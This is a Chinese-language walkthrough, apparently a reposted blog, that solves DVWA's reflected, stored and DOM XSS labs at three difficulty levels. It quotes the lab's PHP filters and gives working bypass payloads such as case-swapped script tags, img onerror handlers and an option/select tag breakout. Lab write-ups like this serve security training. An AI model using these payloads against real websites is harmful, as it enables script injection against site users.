当前位置：首页 > news >正文

dvwa xss通关

news 文章来源：https://blog.csdn.net/m0_56578216/article/details/132523665 2024/11/19 12:29:01

反射型XSS通关

low难度

选择难度：

在这里插入图片描述

直接用下面JS代码尝试：

<script>alert(/xss/)</script>

通关成功：

在这里插入图片描述

medium难度

直接下面代码尝试后失败

<script>alert(/xss/)</script>

发现这段代码直接被输出：

在这里插入图片描述

尝试修改<script>标签的字母大小写，做大小写绕过：

<scRipt>alert(/xss/)</scRipt>

通关成功：

在这里插入图片描述

high难度

查看源码，做代码审计：

<?phpheader ("X-XSS-Protection: 0");// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );// Feedback for end user$html .= "<pre>Hello ${name}</pre>";
}?>

发现源码中用preg_replace函数和正则过滤了任意script字符，并且防大小写，这时候可以用onerror事件,由于引用的链接是错误的，所以onerror事件会返回错误信息alert(/xss/)>，并加载一个错误的图片：

<img src = 1 onerror=alert(/xss/)>

通关成功：

在这里插入图片描述

存储型XSS通关

low难度

直接用下面代码尝试

<script>alert(/xss/)</script>

如图：

在这里插入图片描述

通关成功：

在这里插入图片描述

medium难度

查看源码，做代码审计：

<?phpif( isset( $_POST[ 'btnSign' ] ) ) {// Get input$message = trim( $_POST[ 'mtxMessage' ] );$name    = trim( $_POST[ 'txtName' ] );// Sanitize message input$message = strip_tags( addslashes( $message ) );$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$message = htmlspecialchars( $message );// Sanitize name input$name = str_replace( '<script>', '', $name );$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));// Update database$query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );//mysql_close();
}?>

trim() 方法用于删除字符串的头尾空白符

strip_tags() 函数剥去字符串中的 HTML 标签

htmlspecialchars()函数将><单引号双引号做HTML实体化

发现

$message = trim( $_POST[ 'mtxMessage' ] );

$message = strip_tags( addslashes( $message ) );

$message = htmlspecialchars( $message );

和

$name = trim( $_POST[ 'txtName' ] );

$name = str_replace( '<script>', '', $name );

对message删除空格、剥离HTML标签并把特殊字符实体化（message输入框不能注入），对name删除空格和替换<scrip>为空，但没有过滤大小写，可以在name中做代码的大小写绕过：

<scRipt>alert(/xss/)</scRipt>

由于name的字符长度有限制，可以在源码中进行修改：

在这里插入图片描述

通关成功：

在这里插入图片描述

high难度

查看源码

<?phpif( isset( $_POST[ 'btnSign' ] ) ) {// Get input$message = trim( $_POST[ 'mtxMessage' ] );$name    = trim( $_POST[ 'txtName' ] );// Sanitize message input$message = strip_tags( addslashes( $message ) );$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$message = htmlspecialchars( $message );// Sanitize name input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));// Update database$query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );//mysql_close();
}?>

发现这一关比上一关多了对name的正则匹配过滤大小写和script任意字符：

$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

用onerror事件即可：

<img src = 1 onerror=alert(/xss/)>

通关成功：

在这里插入图片描述

DOM型XSS通关

low难度

打开后发现没有输入框，只有一个选择语言的选项：

在这里插入图片描述

打开hackbar，在URL中输入

<script>alert(/xss/)</script>

通关成功：

在这里插入图片描述

medium难度

查看源代码，做代码审计：

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {$default = $_GET['default'];# Do not allow script tagsif (stripos ($default, "<script") !== false) {header ("location: ?default=English");exit;}
}?>

stripos函数：查找双引号中的字符在字符串中第一次出现的位置

发现这关对script标签有一个过滤，所以不用script标签

尝试输入

<img src = 1 onerror=alert(/xss/)>

并查看页面的前端代码,发现它输出中有一个标签闭合，还有一个</select>标签：

在这里插入图片描述

我们需要让<option标签提前闭合，并加一个<select标签才能输出我们需要的代码并出现弹窗：

/option><select><img src = 1 onerror=alert(/xss/)>

通过成功：

在这里插入图片描述

high难度

查看源代码：

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {# White list the allowable languagesswitch ($_GET['default']) {case "French":case "English":case "German":case "Spanish":# okbreak;default:header ("location: ?default=English");exit;}
}?>

array_key_exists：查找键名（数组元素名）是否存在数组中

is_null函数:用于检测变量是否为 NULL

这段代码中的if语句将所有输入的字符全部过滤，这时候只要将语句注释，让后端代码接收即可：

#<script>alert(/xss/)</script>

通关成功：

在这里插入图片描述

dvwa xss通关

反射型XSS通关 low难度选择难度： 直接用下面JS代码尝试： <script>alert(/xss/)</script>通关成功： medium难度直接下面代码尝试后失败 <script>alert(/xss/)</script>发现这段代码直接被输出： 尝试…...

编程日记 2023/8/28 16:10:08

AD如何进行汉化

AD如何进行汉化通过安装好AD后，默认都是英文界面模式，如果想汉化为中文模式，需要点击“DXP”->“参数选择”，打开界面如下： 然后将上图“本地化”下面的方框勾选上，点击“应用”，“确定”…...

编程日记 2023/8/28 16:09:06

【JUC基础】JUC入门基础

目录什么是JUC线程和进程锁传统的 synchronizedLock 锁Synchronized 与 Lock 的区别生产者和消费者问题Synchronized 版Lock版Condition 的优势：精准通知和唤醒线程 8 锁现象问题1：两个同步方法，先执行发短信还是打电话？问题2&a…...

编程日记 2023/8/28 16:08:05

自然语言处理: 第十章GPT的API使用

理论基础现在的以GPT为首的生成类模型，它拥有对话的能力，它会根据你输入的暗示(prompt)或者指令(instruct)生成对应的回答。所以，不同的输入会导致不同的输出(其实由于chatgpt最终生成的答案是beam_search 以及随机采样的机制，所…...

编程日记 2023/8/28 16:07:04

docker使用harbor进行镜像仓库管理演示以及部分报错解决

目录一.安装harbor和docker-compose 1.下载 2.将该文件修改为这样，修改好自己的hostname和port，后文的用户和密码可以不改也可以改，用于登录 3.安装二.修改daemon.json文件和/etc/hosts文件三.使用powershell作windows端域名映射四…...

编程日记 2023/8/28 16:06:03

【精算研究01/10】计量经济学的性质和范围

一、说明计量经济学是使用统计方法来发展理论或测试经济学或金融学中的现有假设。计量经济学依赖于回归模型和零假设检验等技术。计量经济学也可以用来预测未来的经济或金融趋势。图片来源：https://marketbusinessnews.com 二、计量经济之简介计量经济学是对经济…...

编程日记 2023/8/28 16:05:00

【python知识】用 Tkinter实现“剪刀-石头-布”和“弹球游戏 ”

一、提要 Tkinter是一个Python内置模块，它提供了一个简单易用的界面来创建GUI。在实现一些动态的画面、如游戏还是需要一些创新性思维的。在本文中，我们将使用 Tkinter 探索 Python GUI 编程。我们将介绍 Tkinter 的基础知识，并演示如何使用…...

编程日记 2023/8/28 16:03:59

drawText() 绘制文字绘制进度条:paint.strokeCap Paint.CAP.RONUD 线条两边样式设置文字字体:paint.typeFace Resources.Compat.getFont(context,font) 设置加粗 paint.isFakeBoldText 设置居中: paint.setTextAlign Paint.Align.CENTER //居中, 并不是真正的居中往…...

编程日记 2023/8/28 16:02:57

基于AVR128单片机智能传送装置

一、系统方案 1、板载可变电阻（电位器）R29的电压作为处理器ATmega128的模数转换模块中单端ADC0的模拟信号输入（跳线JP13短接）。 2、调节电位器，将改变AD转换接口ADC0的模拟信号输入，由处理器完成ADC0的A/D转…...

编程日记 2023/8/28 16:01:56

Nexus私有仓库+IDEA配置远程推送

目录一、docker安装nexus本地私服，Idea通过maven配置deploy本地jar包（简单） 二、docker push镜像到第三方nexus远程私服（shell命令操作） 三、springboot通过maven插件自动生成docker镜像并push到nexus私服&#xf…...

编程日记 2023/8/28 16:00:55

idea2023项目上传到gitee

1、按照gitee插件 File——>Settings plugins——>Marketplace下面搜索gitee,然后按照gitee插件 2、上传项目 VCS_——>Share Project on Gitee 如果第一次没登录的需要先登录，登录完后就可以上传了...

编程日记 2023/8/28 15:59:52

【golang】派生数据类型---指针标识符、关键字等

1、指针对比C/C中的指针，go语言中的指针显得极为简洁，只是简单的获取某个空间的地址或者根据指针变量中的内容获取对应存储空间的内容等操作。具体示例如下： go中使用指针需要注意的点： 可以通过指针改变它所指向的内存空…...

编程日记 2023/8/28 15:58:50

深度学习技术

深度学习是什么？ 深度学习，英文名为Deep Learning，其实就是机器学习的一种高级形式。它的灵感来源于人脑神经网络的工作方式，是一种让机器可以自主地从数据中学习和提取特征的技术。你可以把它想象成一位小侦探，通过不…...

编程日记 2023/8/28 15:57:48

TCP/IP网络江湖——物理层护江山：网络安全的铁壁防线（物理层下篇：物理层与网络安全）

TCP/IP网络江湖——物理层护江山：网络安全的铁壁防线（物理层下篇：物理层与网络安全）〇、引言一、物理层的隐私与保密1.1 加密技术的护盾1.2 安全传输协议的密约1.3 物理层的安全控制1.4 面对未知威胁的准备二、电磁干扰与抵御2.1 电磁干扰的威胁2.2 抗干扰技术的应用2.3 屏…...

编程日记 2023/8/28 15:56:48

python-数据可视化-使用API

使用Web应用程序编程接口 （API）自动请求网站的特定信息而不是整个网页，再对这些信息进行可视化使用Web API Web API是网站的一部分，用于与使用具体URL请求特定信息的程序交互。这种请求称为API调用。请求的数据将以易于处理的…...

编程日记 2023/8/28 15:55:47

窗口看门狗

从下往上看: 1. 时钟设置 RCC_APB1PeriphClockCmd(RCC_APB1Periph_WWDG,ENABLE);//使能独立看门狗时钟 WWDG_SetPrescaler(WWDG_Prescaler_8);//看门狗预分频器WWDG counter clock (PCLK1/4096)/8 2.设置窗口值实际就是设置WWDG_CR的低七位值, 但是这个值要大于0x40(也就是…...

编程日记 2023/8/28 15:54:46

开发新能源的好处

风能无论是总装机容量还是新增装机容量，全球都保持着较快的发展速度，风能将迎来发展高峰。风电上网电价高于火电，期待价格理顺促进发展。生物质能有望在农业资源丰富的热带和亚热带普及，主要问题是降低制造成本，生物乙…...

编程日记 2023/8/28 15:53:45

error: can‘t find Rust compiler

操作系统 win11 pip install -r requirements.txt 报错如下 Using cached https://pypi.tuna.tsinghua.edu.cn/packages/56/fc/a3c13ded7b3057680c8ae95a9b6cc83e63657c38e0005c400a5d018a33a7/pyreadline3-3.4.1-py3-none-any.whl (95 kB) Building wheels for collected p…...

编程日记 2023/8/28 15:52:43

全面解析MES系统中的车间退料管理

一、车间退料管理的定义： 车间退料是指在生产过程中，将不合格或多余的物料、半成品或成品从车间环节返还到供应链的过程。车间退料管理则是指对这一退料过程进行规范化、系统化的管理和跟踪。二、车间退料管理的流程： 1. 退料申请&#xf…...

编程日记 2023/8/28 15:51:41

探究finally代码块是否执行

情况一：try代码块正常执行，无异常，finally代码块无retrun； 代码演示 public class Test38 {public static void main(String[] args) {int foo foo();System.out.println("foo:" foo);}public static int foo() {tr…...

编程日记 2023/8/28 15:50:40

leetcode刷题（字符串相加、包含每个查询的最小区间、模拟行走机器人、环形子数组的最大和、满足不等式的最大值、四数之和、树中距离之和）

目录 1、字符串相加 2、包含每个查询的最小区间 3、模拟行走机器人 4、环形子数组的最大和 5、满足不等式的最大值 6、四数之和 7、树中距离之和 1、字符串相加 class Solution:def addStrings(self, num1: str, num2: str) -> str:i len(num1) - 1 # num1的末…...

编程日记 2023/8/28 15:49:39

Grafana reporter定时报表踩坑记录

前言：本以为测试grafana reporter功能能很顺利，但按照网上大佬分享的记录进行操作，屡屡报错，不知是因为我的grafana部署在k8s中之前由低版本升级到高版本导致的，还是其他原因，在grafana中安装Grafana Image Renderer 一直报错。 Github地址：https://github.com/IzakMar…...

编程日记 2023/8/28 15:48:33

Flutter 状态管理引子

1、为了更好地了解状态管理，先看看什么是状态。在类似Flutter这样的响应式编程框架中，我们可以认为U相关的开发就是对数据进行封装，将之转换为具体的U1布局或者组件。借用Flutter官网的一张图，可以把我们在第二部分做的所有开发…...

编程日记 2023/8/28 15:47:31

CFC编程入门_【10分钟学会】

什么是CFC： 【差不多10分钟全学会】 CFC是图形化编程， 跟单片机的连线一样， 唯一的区别：功能块右侧是【只能输出】引脚。只有左侧引脚可以输入输出。有哪些控件： 指针：用于拖动功能块。控制点&#xf…...

编程日记 2023/8/28 15:46:29

golang无需创建新切片

在 Go 语言中，append(b, 0)[:len(b)] 是一种常见的用法，用于在切片 b 后追加一个元素，并返回旧切片的前 len(b) 个元素。这种用法的目的是将一个新元素追加到切片中，并确保切片的长度保持不变。具体步骤如下： 1. ap…...

编程日记 2023/8/28 15:45:28

Django基础5——ORM中间程序

文章目录一、基本了解二、ORM基本操作2.1 连接数据库2.1.1 使用sqlite数据库2.1.2 使用MySQL数据库 2.2 对数据库操作2.2.1 增（前端数据——>数据库）2.2.2 查（数据库——>前端展示）2.2.3 改（修改数据&#xff0…...

编程日记 2023/8/28 15:44:26

SpringAOP详解（上）

当需要在方法前后做一些操作就需要借助动态代理来实现一、动态代理实现方法 1、jdk自带实现方式 jdk实现代理是被代理类实现接口的方式 public interface UserInterface {void test(); }public class UserService implements UserInterface {public void test() {System.o…...

编程日记 2023/8/28 15:43:25

C++ 存储类

存储类定义 C 程序中变量/函数的范围（可见性）和生命周期。这些说明符放置在它们所修饰的类型之前。下面列出 C 程序中可用的存储类： autoregisterstaticexternmutablethread_local (C11) 从 C 17 开始，auto 关键字不再是 C 存储…...

编程日记 2023/8/28 15:42:24

【教程分享】Docker搭建Zipkin，实现数据持久化到MySQL、ES

1 拉取镜像指定版本，在git查看相应版本，参考： https://github.com/openzipkin/zipkin 如2.21.7 docker pull openzipkin/zipkin:2.21.7 2 启动 Zipkin默认端口为9411。启动时通过-e server.portxxxx设置指定端口 docker run --name zi…...

编程日记 2023/8/28 15:41:23

数据库——MySQL高性能优化规范

文章目录数据库命令规范数据库基本设计规范1. 所有表必须使用 Innodb 存储引擎2. 数据库和表的字符集统一使用 UTF83. 所有表和字段都需要添加注释4. 尽量控制单表数据量的大小,建议控制在 500 万以内。5. 谨慎使用 MySQL 分区表6.尽量做到冷热数据分离,减小表的宽度7. 禁止在…...

编程日记 2023/8/28 15:40:21